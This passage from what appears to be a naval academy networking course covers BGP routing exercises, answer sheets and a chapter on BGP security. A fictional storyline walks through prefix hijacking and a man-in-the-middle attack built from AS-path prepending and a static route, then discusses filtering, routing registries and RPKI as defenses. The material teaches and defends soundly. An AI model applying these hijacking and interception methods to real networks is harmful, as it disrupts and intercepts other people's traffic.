autonomous systems. Question 14: Assuming no local preferences are set, what path will Router 20 advertise to its peers to reach 17.17.200.0/24? Label part c) on your network diagram with the network address and the AS-Path that Router 20 will announce to all other peers. Finally, Router 16 will learn about the network 17.17.200.0/24 from both Router 20 and Router 30. It will also apply its own BGP path selection algorithm to decide which path it should use in order to reach the network 17.17.200.0/24 which contains the MidTube webserver. Question 15: Assuming no local preferences are set and comparing your answers to parts b) and c) on your network diagram, what path will Router 16 select to get to the MidTube webserver on network 17.17.200.0/24? Draw a line on your network diagram of the selected path starting from EC310 MID going all the way to the MidTube webserver. Recall from SX#15 and SX#16 that there are two methods to discover information about the actual route traversed between you and destination IP address. The first method is the utility ping with record route, which tells you the IP addresses of the OUTGOING interfaces along the way to and from the final destination. The second method is the utility traceroute, which works similar to ping except it tells you the address of the INCOMING interface along the path between you and your destination. Windows has both utilities available, but we will only use the utility traceroute for this security exercise. Additionally, it is important to know this utility has a slightly different name in Windows, tracert, as shown in the example in Figure 1 on page 4. Question 16: Confirm your answer to Question 15 by performing a tracert (do not forget the –d option) to the MidTube webserver. List the IP addresses in the order they appear on your answer sheet. Figure 1 – Example of tracert command. 414 Part 3: The Return of Prof. Evil ITSD, after discovering the malicious behavior of Prof. Evil in SX#16, conducted a thorough security review of all routers within the USNA network. They implemented several technical solutions to prevent a malicious actor within AS2016 from injecting false routing information into the USNA network. Question 17: What are two technical solutions ITSD may have implemented to protect against false route injection within the USNA network? With his evil plans thwarted, Prof. Evil must now look for new ways to prevent midshipmen from reaching websites of interest. Ever since the new security policies took place, he has become increasingly abrasive in class. In fact, he completely skipped entire sections of the last lecture and refused to complete practice problems in class. He even asked you to read the chapter notes on your own (the audacity!). Reluctantly, you arrange for an EI session with Prof. Evil to help prepare for the next exam, but upon arrival to his office he shouts at you to leave immediately. Embittered, you turn to leave but notice out of the corner of your eye a web page on his computer, www.pta.net. Verify the website www.pta.net exists by opening Firefox or Chrome on your Windows computer (i.e., not you Cyber2 VM) and navigating to the website address. Browse the website to see what information is available. Question 18: What does the PTA believe concerning student’s time? Question 19: What device was used as part of a novel in-class exercise to enhance STEM-based learning? It seems MIDN Roy may not be the only member of the Naval Academy with an extreme ideology. Concerned, you decide to investigate things further by identifying the source of this propaganda. Specifically, you want to know who is responsible for publishing this content and how it can be reached across the Internet. You speak with ITSD about this matter and discover that AS2003 hosts network 21.200.3.0/24 where the PTA webserver is located. ITSD also informs you they have implemented several local preferences in BGP to limit Prof. Evil’s impact on the other Internet users. Specifically, AS30, Chesapeake Cable, is weighted over AS20, Bay Area Broadband, for all traffic destined for network 21.200.3.0/24. Question 20: Given your discoveries, what path will Router 16 select to reach the PTA webserver on network 21.200.3.0/24? Question 21: Confirm your answer to Question 20 using tracert (do not forget the –d option) to identify the actual path to the PTA webserver. Did it match your expected results? Your friend is confused. He looks at his network diagram and realizes the shortest AS path to network 21.200.3.0/24 is directly through AS20. Why would traffic destined for this network travel through another route? Question 22: What is the answer to your friend’s question? Explain. 415 Part 4: MidTube? Exhausted from your detailed investigation, you decide to check if there are any new videos on MidTube because sometimes you just don’t want to pay attention in class. To increase speed and performance your web browser stores a local copy of the webpage so it does not have to access the MidTube webserver as often. Unfortunately, this also means that new content might be missed unless you force your web browser to refresh. Navigate to the website www.midtube.com. When directed, force your web browser to refresh www.midtube.com using either method below. Ctrl + Shift + R Shift + or Question 23: Gasp… What shocking event just happened!? Frustrated by EC310 yet again, you turn to your email and see the following note: Dear EC310 Midshipmen, I have reported you and your precious MidTube to the PTA! Your singing, dancing, and general happiness are NOT furthering your education in my classes! Although ITSD has restricted my ability to influence the USNA network, their authority ends at its border. Therefore, you will suffer under my limited purview until you complete the attached assignment. Only then will I ask the PTA to restore MidTube. Never respectfully, Prof. Evil <SX19_An_Analysis_of_The_Rectabular_Excrusion_Bracket.docx> To Be Continued… (in SX 18!) Question 24 (Extra Credit): How was the PTA able to take down MidTube? (Hint: Think back to SX#16) Part 5: Clean Up Close all tabs in Chrome or Firefox. Disconnect the blue Ethernet cable. Turn on your wireless adapter. 416 Security Exercise 17 Answer Sheet Name: Question 1: Question 2: Question 3 (circle one): Address Resolution Protocol Open Shortest Path First Protocol Border Gateway Protocol Open Shortest Path First Protocol Border Gateway Protocol Question 4: Question 5: Question 6: Question 7 (circle one): Address Resolution Protocol Question 8 (circle one): Intra-domain Routing Protocol Inter-domain Routing Protocol Question 9 (circle one): Address Resolution Protocol Open Shortest Path First Protocol Border Gateway Protocol Question 10 (circle one): Intra-domain Routing Protocol Inter-domain Routing Protocol Question 11: 417 Question 12: See part a) of your network diagram. Question 13: See part b) of your network diagram. Question 14: See part c) of your network diagram. Question 15: Draw the selected path on your network diagram. Question 16: Question 17: Question 18: Question 19: Question 20: Question 21: Question 22: Question 23: Question 24 (Extra Credit): 418 Network: _____._____._____._____ /____ c) .2 .1 4.4.4.0/24 18.18.18.0/30 .1 AS 30 .2 .1 16.16.16.0/30 .1 .2 .2 .2 www.pta.net 21.200.3.2 AS 2003 Network: 17.17.200.0/24 AS-Path: 2005 R60 AS 60 14.14.14.0/30 .1 21.200.3.0/24 Network: 21.200.3.0/24 AS-Path: 2003 R3 SX18 ONLY Network: _____._____._____._____ /____ .1 .2 .2 20.20.20.0/30 .1 R5 17.17.200.2 www.midtube.com 17.17.200.0/24 AS 2005 .2 AS-Path: _________________________ 13.13.13.0/30 9.9.9.0/30 19.19.19.0/30 R30 15.15.15.0/30 EC310 Security Exercise 17 & 18 .2 .1 .1 8.8.8.0/30 .2 .2 AS 40 R40 .1 b) 7.7.7.0/30 AS 50 R50 a) AS-Path: _________________________ Network: _____._____._____._____ /____ .2 12.12.12.0/30 Network: _____._____._____._____ /____ RA AS-Path: ____________________________ .1 .2 Other USNA Networks R16 3.3.3.0/30 .1 AS-Path: _________________________ AS 20 .1 AS 2016 R20 RC .2 2.2.2.0/29 .1 .10 ?.?.?.?/?? 419 420 Chapter 18: Border Gateway Protocol Routing Objectives: (a) Given a network diagram consisting of a limited number of connected Autonomous Systems (AS) and various BGP path announcements, determine the direction of traffic across all ASes in accordance with the BGP path selection algorithm. (b) Identify what is required to secure Internet routing, distinguish the negative and positive consequences of various proposed solutions, and recognize the state of security in Internet routing today. (c) Describe the steps that should be taken to prevent false route injection in or manipulation of the Internet routing system and identify who is responsible for performing these preventative actions and how they can be applied. (d) State the fundamental principle of communication as it relates to security. When we last left off in Security Exercise 17, your viewing pleasure was rudely interrupted by Prof. Evil. Specifically, Prof. Evil contacted the Professional Teaching Association (PTA), who took it upon themselves to disrupt access to MidTube for all Internet users. But how did the PTA pull off such a feat? More importantly, why were they able to do this and how can they be stopped? I. Stealing the Internet: Network Prefix Hijacking 1. MidTube? The essence of the PTA’s attack rests on the same principles we saw at work in Chapter 16. That is, the PTA had to take four distinct actions in order to deny you access to the MidTube webserver. 1. 2. 3. 4. Take control of a machine on the network and manipulate its operation. Force the machine to tell the “right” kind of lie. Force the machine to spread the lie around. Force other machines to believe the lie. The only change from Chapter 16 was the introduction of BGP and its subsequent manipulation to facilitate the PTA’s objectives. By generating the appropriate BGP route announcement, the PTA forced their router to hijack the network prefix belonging to the MidTube webserver making it look as if this prefix originated within their own Autonomous System (AS). However, before we dive into the details of their attack, let’s make sure we have the correct understanding of where your traffic should go under normal circumstances. 421 Stick ‘em up, partner! The Internet is like the Wild West in many ways and I am hijacking your network prefix! Practice Problem 18.1 Consider the network diagram and BGP route announcement from Router 5 of AS2005 below. Assuming no local preferences are set, what path will all packets leaving AS2016 take in order to reach the MidTube webserver at 17.17.200.2? 16.16.16.0/30 .2 AS 40 21.200.3.0/24 R40 .2 AS 20 .1 15.15.15.0/30 .1 .2 .2 .2 .2 18.18.18.0/30 .1 12.12.12.0/30 R20 www.pta.net 21.200.3.2 13.13.13.0/30 .2 3.3.3.0/30 AS 2016 14.14.14.0/30 R30 .1 4.4.4.0/24 AS 2003 AS 30 .1 7.7.7.0/30 R16 RC R3 .2 .1 .1 .2 .2 .2 .1 8.8.8.0/30 9.9.9.0/30 20.20.20.0/30 Other USNA Networks Network: 17.17.200.0/24 AS-Path: 2005 .1 .2 AS 50 2.2.2.0/29 RA .1 R60 AS 60 .2 .1 R50 .1 .2 .1 19.19.19.0/30 R5 .1 17.17.200.0/24 .10 ?.?.?.?/?? AS 2005 www.midtube.com 17.17.200.2 How might the PTA craft a BGP route announcement from Router 3 of AS2003 to alter this behavior? Again, because all routers utilize the longest match matching principle, the PTA will force Router 3 to advertise a more specific network ID containing the IP address of the MidTube webserver. As each neighboring AS learns of the new, more specific network prefix, it will apply its own BGP path selection algorithm and forward BGP updates across the Internet promulgating the PTA’s false information. Practice Problem 18.2 What is the first and last IP address of the 17.17.200.0/24 network where the MidTube webserver is located? (a) First Address: (b) Last Address: What network ID and mask should the PTA choose? Are there other options available? Solution: What is the first and last address of the false network the PTA advertised? (a) First Address: (b) Last Address: Does the IP address of the MidTube webserver fall within the IP address block that the PTA advertised? Solution: Finally, given this false BGP route announcement from Router 3 of AS2003, what path will all packets leaving AS2016 take in order to reach the MidTube webserver at 17.17.200.2? 422 Network: 17.17.200.0/25 AS-Path: 2003 16.16.16.0/30 .2 AS 40 21.200.3.0/24 R40 .2 AS 20 .1 15.15.15.0/30 .1 .2 .2 .2 .2 18.18.18.0/30 .1 12.12.12.0/30 R20 www.pta.net 21.200.3.2 13.13.13.0/30 .2 3.3.3.0/30 AS 2016 14.14.14.0/30 R30 .1 4.4.4.0/24 AS 2003 AS 30 .1 7.7.7.0/30 R16 RC R3 .2 .1 .1 .2 .2 .2 .1 8.8.8.0/30 9.9.9.0/30 20.20.20.0/30 Other USNA Networks Network: 17.17.200.0/24 AS-Path: 2005 .1 .2 AS 50 2.2.2.0/29 RA .1 R60 AS 60 .2 .1 R50 .1 .2 .1 R5 19.19.19.0/30 .1 17.17.200.0/24 .10 ?.?.?.?/?? AS 2005 www.midtube.com 17.17.200.2 2. Why Does This Work? There are two reasons why prefix hijacking is possible in BGP: 1) There is no method within BGP to authenticate which network prefixes have been allocated to Autonomous System Numbers (ASNs). 2) There is no method within BGP to authenticate which network prefixes can be originated by an ASN. This point bears repeating: BGP does not provide a mechanism to authenticate the allocation or origin of a network prefix and ASN. Instead, AS network operators must trust the network reachability information that other ASes provide, specifically, where a prefix originates and who it has been allocated to. Without trusting this information, it is impossible to identify how to reach other networks of interest. This mutual trust defines the nature of Internet routing. Hopefully, it is clear this issue is of great concern. The security of Internet routing depends on the accuracy, integrity, and availability of the association between ASNs and the network prefixes they own and advertise. If this information is lost, corrupted, or destroyed the Internet will fail to function as a whole. At the start of the Part II: The Network in Chapter 11, we saw one example of how devastating this can be. YouTube was taken off the Internet by the Pakistan Telecommunication Authority on Sunday, February 4 th, 2008 for one hour. Similar to the Professional Teaching Association’s actions in Security Exercise 17, the Pakistan Telecommunication Authority announced a more specific network prefix which contained YouTube’s IP address space. The Pakistan Telecommunication Authority’s more specific advertisement created a ‘black hole’ where the majority of Internet traffic destined for YouTube 423 was misdirected. Fortunately, their mistake was not malicious in nature, but that does not mean others will not be in the future. If Internet routing is so vulnerable, who or what keeps the Internet up and running? The successful reliable operation of Internet routing is a testament to the many AS network operators responsible for inter-domain routing. In addition, many others are heavily invested in the development of the Internet and its safe and effective operation. Specifically, the Internet Engineering Task Force (IETF), an international collection of academic researchers, network operators, equipment manufacturers, and others has made it their sole mission to simply “make the Internet work better.” To do this, these volunteers produce engineering documents called Requests For Comments (RFCs) that define the operation of the Internet’s protocols. Through open dialogue, technical competence, protocol ownership, rough consensus and running code they work hard to guide the technical architecture and keep the Internet up and running daily. To learn more about the IETF, see http://www.ietf.org. 3. MidTube is Back! Speaking of up and running, it looks like MidTube is back! Let’s break for Part 1 and Part 2 of the Security Exercise. After these parts are complete, we’ll return to your regularly scheduled lecture. Security Exercise 18: Part 1 and Part 2 II. Stealing the Internet: Route Attribute Manipulation 1. Sir/Ma’am, Please Give Me My Password Back Prof. Evil and the PTA are back at their old tricks again! This time, rather than simply shutting down MidTube, they were able to place themselves between you and the MidTube webserver. From that vantage point, they observed all traffic destined for 17.17.200.0/24 and identified those who were enjoying themselves rather than paying attention in class. Let’s take a closer look at how your instructor was able to recover your MidTube username and password and how BGP enabled this. Practice Problem 18.3 Consider the network diagram and BGP route announcement from Router 3 of AS2003 below. Assuming no local preferences are set, for every AS, draw the path that AS would select to reach 17.17.200.2 beginning with the AS router and ending with the MidTube webserver. 16.16.16.0/30 .2 AS 40 21.200.3.0/24 R40 .2 AS 20 .1 15.15.15.0/30 .1 .2 Network: 17.17.200.0/25 12.12.12.0/30 AS-Path: 2003-60-2005 R20 www.pta.net 21.200.3.2 13.13.13.0/30 .2 3.3.3.0/30 AS 2016 14.14.14.0/30 R30 .1 4.4.4.0/24 AS 2003 AS 30 .1 7.7.7.0/30 R16 RC R3 .2 .2 18.18.18.0/30 .1 .2 .2 .1 .1 .2 .2 .2 .1 8.8.8.0/30 9.9.9.0/30 20.20.20.0/30 Other USNA Networks Network: 17.17.200.0/24 AS-Path: 2005 .1 .2 AS 50 2.2.2.0/29 RA .1 R60 AS 60 .2 .1 R50 .1 .2 .1 19.19.19.0/30 R5 .1 17.17.200.0/24 .10 ?.?.?.?/?? AS 2005 424 www.midtube.com 17.17.200.2 What path will AS60 select in order to reach 17.17.200.2? Solution: Why would AS60 choose this path? Solution: What does the attacker gain by prepending this AS60 to their route announcement? Solution: What path will AS2005 select in order to reach 17.17.200.2? Solution: Why would AS2005 choose this path? Solution: What does the attacker gain by prepending this AS2005 to their route announcement? Solution: What additional actions must the attacker take in order to complete the MITM attack? Solution: Finally, what path will all packets leaving AS2016 take in order to reach the MidTube webserver at 17.17.200.2? Solution: There are several elements of this routed wide area MITM attack that are important to understand:35 First and foremost, in order for it to work, there is a portion of the Internet that must be given up as the back path (i.e., the ‘correct’ path) to the target. In this example both AS60 and AS2005 fulfill this role and are deliberately chosen by the PTA to let the victim eventually reach their destination. Therefore, all traffic originating from AS60 and AS2005 would not be forced through AS2003 as opposed to the other ASes across the EC310 internet. Similarly, on the real Internet, an attacker needs to plan his back path appropriately. Surprisingly, there are actually a small number of ASes to choose from. Although the Internet continues to grow daily, the number of ASes between any set of prefixes is still relatively small. As of October 2014, the average AS path length was 3.7891. That is, the ‘diameter’ of the Internet is approximately four ASes wide. Second, this attack combines the use of a more specific network prefix with the modification of BGP route attributes to control the direction of traffic. The PTA is intentionally prepending (i.e., put in front) its ASN to the chosen back path to take advantage of a distinct feature of the BGP path selection algorithm. An AS will not accept a route that includes its own 35 Originally proposed and demonstrated live at DEFCON 16 on 10 August, 2008 by Anton (Tony) Kapela and Alex Pilosov. See https://www.youtube.com/watch?v=S0BM6aB90n8 for more details. 425 ASN in the path. Recall from Chapter 17 this feature of BGP is intended to prevent routing loops. Here, it is twisted for malicious purposes. Of course once you understand how a lock operates, you realize there is more than a key that can open a door. Third, to complete the MITM attack, the attacker must also place a static route within their AS to forward traffic to the final destination. It is not enough to simply redirect all traffic to the attacker’s AS. The attacker has to connect the forward path to the back path of the final destination. A static route provides this connection. A static route is a manually entry into a router about the location of a network. When a router learns about the same network through multiple sources, like the Open Shortest Path First (OSPF) protocol and distance vector routing, a static route has the highest priority. Therefore, the router will use the static route over the other learned routes to reach the same network. Fourth, while certainly clever, there is a large signature associated with this kind of attack due to its potential global impact across the Internet. If it has a significant effect on consumers or providers, network operators often deal with it as soon as possible. Thus, attacks typically last from several minutes to hours. Still, occurrences are not infrequent. A recent report commissioned by the FCC estimated that route hijackings or similar BGP incidents occur once or twice per month, but whether or not the hacker’s intentions are malicious is very difficult to ascertain.36 Interestingly, BGP attacks of a smaller scale (i.e., dealing with only a handful of prefixes) generally go unnoticed. For example, email spammers commonly hijack IP address space to send their unwanted traffic and then disappear. Various techniques have been proposed on how to hide as the man in the middle during a route wide area attack, but the technical details of their implementation are beyond the scope of this course. Finally, the astute midshipmen may realize the aforementioned MITM attack only redirects traffic in the forward direction. That is, traffic leaving AS2016 destined for the MidTube webserver would be forced through AS2003 while traffic leaving AS2005 destined for AS2016 would not be forced through AS2003. The MidTube webserver will respond to all web requests via a separate path chosen by Router 5 of AS2005. For brevity, it is left to the reader to determine the appropriate BGP route announcement that AS2003 should make to intercept traffic in the reverse direction. See Security Exercise 18 extra credit opportunities for details. 2. Why Does This Work? In addition to the two reasons mentioned previously, there is one more reason why this type of MITM attack is possible in BGP: There is no method within BGP to authenticate the route attributes provided by an AS. This point bears repeating: BGP does not provide a mechanism to authenticate the route attributes associated with the announcements of an AS. This means that an AS can announce whatever attributes it would like about any network prefix, regardless of the prefixes’ origin, including the AS path length. As before, this has a significant impact on the security of Internet routing. Not only is it possible for an AS to originate a network prefix without authorization, but any AS along the path can modify the attributes associated with a network prefix at any point. Therefore, the security of Internet routing depends on the ability to authenticate the route attributes provided by an AS. Practice Problem 18.4 What makes route attribute manipulation possible in BGP? Solution: What is required in order to secure Internet routing from route attribute manipulation? Solution: In some contexts modification of route attributes is used for good. For example, inflating the AS path length of a network prefix is a common technique used in traffic engineering. However, as we have just seen, it can also be used for malicious purposes. This leads us to the final question of the networking section: What solutions are available to secure Internet routing? III. The Path Towards Secure Internet Routing 1. The Problem As previously mentioned, the primary vulnerability of the Internet routing system is a lack of means to authenticate the ASNs, network prefixes, and route attributes provided by others. Without an objective baseline to compare 36 See Secure BGP Deployment Final Report by the FCC’s CSRIC III, Working Group 6, March, 2013 for more details. 426 against, network operators are left to fend for themselves as to whom and what they believe. This is made more difficult by a number of other issues: First, compounding the problem is the fact that the Internet routing system grows on a daily basis. The exponential growth of the BGP IPv4 routing table is illustrated in Figure 1. The number of active BGP entries (i.e., currently advertised network prefixes) is on the vertical axis and the date in years is on the horizontal axis. Consider the number of prefixes advertised today (~520,000) relative to the number of prefixes advertised in 1999 (~70,000). Such nonlinear growth makes the challenge to sort fact from fiction immense, especially given that any one of these prefixes may be malicious in nature. Figure 1 – The number of active BGP entries versus the date in years. Second, exacerbating things further is that fact that the number of ASes in the Internet has also increased linearly over time. This rate of increase is evidenced by the positive slope of the line in Figure 2. The number of unique ASes is on the vertical axis and the date in years is on the horizontal axis. Again, when comparing the number of ASes today (~48,660) relative to the number of ASes in 1999 (~4,400) there is an order of magnitude difference. As more ASes are introduced every day, the challenge to distinguish between true and false advertised information grows more difficult. If even one AS is successful in sending malicious information, it could alter the flow of traffic across the entire Internet. Figure 2 – The number of unique ASes versus the date in years. Third, who is responsible for the Internet anyways? While the organizations (IANA, IETF, etc.) we have discussed thus far are heavily involved in making the Internet function better, none of them have the authority to administer punishment for abuse of the network. Part of the celebrated history of the Internet is its free and open nature in which anyone can connect and share with others. Moreover, many non-profit organizations, private corporations, and governments wish for it to remain a free domain and may reject any security solution which does not preserve these principles. Lastly, when considering any security vulnerability, the financial cost to fix the problem is a considerable factor in driving how quickly any solution may be adopted. It is one thing to tell all AS network operators to secure their networks, but it is an entirely different to determine who is going to pay for it. Unfortunately, the full details of these policy, financial, and governmental issues are outside the scope of this course, but nevertheless they have a significant impact on the security of Internet routing. 427 2. The Solution There are three technical solutions that AS network operators can use right now to combat the issues which have been identified in this chapter: 1) Filtering, 2) Internet Routing Registries, and 3) Resource Public Key Infrastructure (RPKI). 373839 BGP security remains an active area of research and alternative solutions may be available in the future. Filtering. Best current practices for AS network operators dictate the use of filters at AS borders to reject suspicious route announcements or alter malicious route attributes. Filters are manually established based on the routing policies of an organization and are commonly used to: 1) prevent private IP addresses and other special use addresses from being routed across the Internet; 2) remove routes with exceptionally long AS paths; 3) limit the number of network prefixes introduced in the global BGP routing table by their the mask length (e.g., do not advertise a network greater than /24); along with many other purposes. ISPs have the ability to filter their customer’s routes because they often have direct knowledge of what IP addresses they have allocated to their customers and which ASes should be announcing their prefixes. Information from stub ASes can be readily authenticated because they should have a limited number of advertisements and exchange this information with only one ISP. The real trouble is introduced not at the ‘edge’ of the Internet with stub ASes, but from multihomed and transit ASes which are farther away from one another. That is, it is very hard for an ISP to filter the routes of another ISP that has their own set of customers, policy constraints, and geographic concerns. 40 It is important to understand that filtering has both a business cost and computational cost associated with it. If an ISP filters too aggressively, it may prevent customers from reaching legitimate destinations. Unhappy customers could lead to a loss of revenue. There is also an intensive amount of manual labor required to create and maintain these filters, which also costs an organization time and money. The routers performing the filtering must also be able to store all of the policies of an organization along with their routing tables and respond to dynamic changes in the Internet’s topology. As an example of how frequently Internet routing data can change, consider the peak BGP update rate over a seven-day period in October 2014 shown in Figure 3. At its peak, over 4000 BGP update messages and over 6000 BGP route withdrawals were sent per second. Each update or withdrawal could cause the BGP path selection algorithm to run against the organization’s policies and consume a large amount of CPU processing time. To help meet this significant computational demand, routers use a special type of memory called Ternary Content Addressable Memory (TCAM) which is much more expensive than the common RAM which we learned about in Chapter 1. Thus, the cost of the individual router increases as the demands of filtering expands. Hopefully it is clear the consequences of filtering are significant and not a trivial matter to implement or maintain. Figure 3 – Peak prefix update rate per second versus the date in years. Furthermore, for filtering to work effectively, everyone must do it and do it with an equally strict level of scrutiny. How likely do think it is that all ISPs in all countries will meet the same high standard? If even one falls short, or one router in one ISP is compromised, a malicious routing entry can corrupt the global BGP table. Internet Routing Registries. The first efforts to establish a baseline for the Internet routing system are the Internet Routing Registries. The idea behind them is very simple. They are repositories of the IP prefixes, ASNs, routing policy, network topology, and human points of contact for those ASes which choose to register their information. These databases can be 37 As proposed in A Survey of BGP Security Issues and Solutions by Bulter et al., January, 2010. As proposed in the Secure BGP Deployment Final Report by the FCC’s CSRIC III, Working Group 6, March, 2013. 39 See RFC 6480 (http://tools.ietf.org/html/rfc6480) for more details. 40 See See “How Egypt did (and your government could) shut down the Internet” for more details (http://arstechnica.com/tech-policy/2011/01/how-egypt-or-how-your-government-could-shut-down-the-internet/) 38 428 queried by any AS through an application separate from BGP to authenticate the routing information received via BGP. ASes may use this information to construct their BGP filters in order to screen malicious or erroneous advertisements from others. Often ISPs will require their customers to register their prefixes in an IRR before the ISP will even announce the customer’s prefix onto the Internet. Again, this solution works well at the ‘edge’ of the Internet but becomes increasingly difficult when stub ASes are not considered. While this method may be effective, the downside is that these registries are only effective if the registry data is secure, complete, and accurate, which is currently not guaranteed. 41 Additionally, even the Regional Internet Registries (RIRs) do not always have accurate records of the organizations and their allocated IP addresses. Over time businesses change ownership, sub-divide, or enter bankruptcy, invalidating the original IP address allocation data. Additionally, because an organization’s routing policy and network topology is considered private property, organizations do not have an incentive to update their information in either the IRRs or with the RIRs. For example, a company like Netflix aims to keep the information about how it connects with other ISPs private to maintain an advantage over its competitors. Thus, they are unlikely to updating their IRR or RIR information. Resource Public Key Infrastructure (RPKI). Since the security of Internet routing necessitates secure, complete, and accurate routing information, the most current ideal solution is the Resource Public Key Infrastructure (RPKI). This was recently made available by all of the RIRs in 2011.42 Similar to the IRRs, RPKI is a repository of Internet routing information. The key difference is that it uses the X.509 certificate system to provide cryptographic assurance of: 1. 2. The association between an ASN and the IP prefixes it has been allocated. The association between an ASN and the IP prefixes it is authorized to originate. This is the same idea as when you establish a secure connection with a website. When the lock closes in your browser ( ) and you establish a secure connection with a website, you know the public key that was used to transfer a symmetric encryption key was done using the public key that belongs to a particular domain name. With RPKI though a router can know if the IP prefixes that are advertised by an ASN may be originated by that ASN. This point bears repeating: RPKI only provides cryptographic assurance of the association between 1) an ASN and the IP prefixes it has been allocated and 2) an ASN and the IP prefixes it is authorized to originate. It accomplishes the second objective through Route Origin Authorizations (ROAs) which attest to what ASN can originate an IP prefix(es). ROAs are digitally signed by the prefix owner to certify which ASN may originate that IP address space. Dissimilar to the IRRs, the timeliness of the information in the RPKI database can be validated by checking a certificate’s expiration date. In fact, there is a direct mechanism for authorized address holders to revoke certifications to preserve the integrity of the database. More importantly, notice what is absent in RPKI. There is nothing in RPKI which validates the route attributes, including the AS path, associated with a BGP route announcement from an AS. Nor does it provide certainty that the AS which has registered their information used the correct ASN or set of prefixes. Nor does it provide network topology information or human points of contact as with IRRs. Lastly, it does not mandate that network operators use this information when constructing their filters. How RPKI is applied is entirely dependent on what AS network operators choose to do with the information available. The hope is, as trust in RPKI increases, network operators will use it more often to certify their IP resources while furthering its use in their networks. However, as with any new large scale and complex system, new vulnerabilities may be introduced. For example, at any time any authorized address holder can revoke the certificates of those whom they have sub-allocated their address space to. Initially, this method may appear like a smart and convenient method for an ISP to control negligent or irresponsible customer behavior. However, if an ISP or a country wanted to restrict Internet access for a group of people, abuse of the RPKI Certificate Revocation List (CRL) could provide a way of doing so. Practice Problem 18.5 Briefly describe two technical solutions to prevent manipulation of the Internet routing system. Solution: Briefly describe the negative and positive consequences of these two solutions for secure Internet routing. Solution: 41 42 A Survey of BGP Security Issues and Solutions by Bulter et al., January, 2010. Some RIRs began offering RPKI as early as 429 3. See For Yourself At this point, we’ll head out on to the real Internet and wrap up Part 3 of the Security Exercise. After the Security Exercise is done, we’ll complete your regularly scheduled lecture. Security Exercise 18: Part 3 IV. Conclusion Communication is an inherently insecure process. It is never a question how to make communication perfectly secure, but it is a question of how to mitigate the risks to an acceptable level for the parties involved. To help make this fundamental principle clear, let’s strip away all the complexity in computer communications that we have introduced to date. Hopefully, we have shown you that complexity (e.g., routers, protocols, networks addressing schemes, etc.) can create vulnerabilities. However, even the most simplistic forms of communication are still inherently insecure, but to understand how requires a bit more understanding of the how the electromagnetic spectrum works. That is, before we can become a locksmith (of wireless communication), we need to know a bit more about how the lock (the electromagnetic spectrum) operates. 430 Problems 1. What is an IP prefix? a. The network ID. b. 200.15.78.128/25 c. The range of IP addresses assigned to a network. d. All of the above. 2. As an Autonomous System (AS), what is the difference between originating an IP prefix and being allocated an IP prefix? 3. What are Border Gateway Protocol (BGP) route attributes and what are they used for in BGP? 4. What defines the nature of Internet routing? 5. Two types of attacks were discussed in Chapter 18: 1) route hijacking and 2) the routed wide area MITM attack. What is the difference in how BGP is exploited in each attack? 6. What information is required to secure Internet routing? 7. What is the most current ideal solution to secure Internet routing? 8. Who is responsible for implementing the technical solutions to secure Internet routing proposed in Chapter 18? 9. What makes securing the Internet routing so difficult today and in the future? 10. Filtering was mentioned as one of the technical solutions to a routed wide area Man-In-The-Middle (MITM) attack. What is one negative consequence of filtering? 11. What must be true for filtering to be effective in securing Internet routing? 12. Why is filtering so difficult to implement and maintain? 13. How is RPKI different than the Internet Routing Registries (IRRs)? 14. RPKI was proposed as one technical solution to secure Internet routing. It uses cryptography to provide assurance of the association between: 1) ________________________________ and _____________________________________ 2) ________________________________ and _____________________________________ 15. What tool does RPKI provide to attest to what ASNs can originate which IP prefixes? 16. Even if using filtering, the IRRs, and RPKI, what aspect of BGP is still vulnerable to manipulation? 17. What is the fundamental principle of communication as it relates to security? 18. What IP prefix and AS path should Router 50 announce to hijack the Midtrest webserver? 431 19. Consider the network diagram and BGP route announcement from Router 50 of AS50 below. AS10 is a multihomed AS. Assuming no local preferences are set, for every AS, draw the path that AS would select to reach 30.31.51.10 beginning with the AS router and ending with the Midtrest webserver. AS 20 1.2.3.0/24 R20 1.1.1.0/30 R10 AS 40 www.midtrest.com AS 10 4.4.4.0/30 2.2.2.0/30 R30 5.5.5.0/30 7.7.7.0/30 30.31.51.10 3.3.3.0/30 R40 8.8.8.0/30 30.31.32.0/19 AS 30 AS 50 9.9.9.0/30 R50 10.10.10.0/30 AS 70 R70 Network: 30.31.48.0/20 AS-Path: 50-70-40 432 Network: 30.31.32.0/19 AS-Path: 40 Security Exercise 18 Part 1: Initial Setup Now that we understand how the Internet is put together, let’s take a closer look at how it can be pulled apart. 1. Set-Up Yes, I take Movemeber very seriously, and if you seriously want to be an Astronaut, you should know who I am and what I do now. Remember, ’68 is great! Equipment needed: A printed or electronic copy of this security exercise. o If printed, separate the network diagram and answer sheet at the back of this exercise and have them ready to fill in. Your issued Laptop. o Ensure Chrome or Firefox is installed on your Windows computer. o Turn up the volume on your computer. o Turn off the wireless adapter. o Connect the blue Ethernet cable at your desk to your issued laptop. o Wait for an IP address to be assigned to your LAN interface. o Verify by pressing the Windows Orb key and in the program search bar, type cmd Hit enter to launch the Windows terminal and then, at the command prompt, execute ipconfig Now, your screen should look similar to the figure below. Your Ethernet adapter should be assigned an IP address of 192.168.XX.YYY, where XX is your classroom number and YYY is a number between 101 and 254. If not, notify your instructor or lab technician. 433 Part 2: We Want MidTube! 1. MidTube is Back! When we last left off in SX#17, MidTube had been shut down by the Professional Teaching Association (PTA) at the request of Prof. Evil. This ban would not to be lifted until a thorough review of the Rectabular Excrusion Bracket was accomplished by all EC310 midshipmen. To pull off their block, the PTA advertised a more specific network prefix which contained the address of the MidTube webserver. This forced all traffic destined for MidTube across the EC310 internet to be redirected to AS2003. As you just learned in lecture this type of attack is commonly referred to as prefix hijacking. Question 1: What feature about BGP makes it possible for the PTA to hijack MidTube? Question 2: What is required to secure Internet routing from prefix hijacking? Have no fear. The Superintendent heard word from the Brigade of Prof. Evil’s heartless actions. In fact, several bitter angry midshipmen stormed his office over the weekend to complain; and, as you well know, if there is one thing we cannot have the Naval Academy it is cynical midshipmen. Therefore, the Superintendent quickly took action and directed Prof. Evil to restore MidTube immediately or face disciplinary action. Thwarted yet again, Prof. Evil reluctantly agreed and contacted the PTA to remove the block. Now, once again, for your viewing pleasure, visit http://www.midtube.com. Access the website www.midtube.com by opening Firefox or Chrome on your Windows computer (i.e., not your Cyber2 VM) and navigating to the website address. Log in by creating a username and password of your choice (do not use a username or password you would not like exposed). Browse the website to see what information is available. Question 3: Gasp… what shocking event just happened? Question 4: Perform a tracert (do not forget the –d option) to the MidTube webserver. List the IP addresses in the order they appear on your answer sheet. Is this the correct route to the MidTube webserver? 2. The PTA’s Back! It seems Prof. Evil and the PTA are back to their old tricks again! This time, rather than simply shut down MidTube, they were able to place themselves in between you and the MidTube webserver. 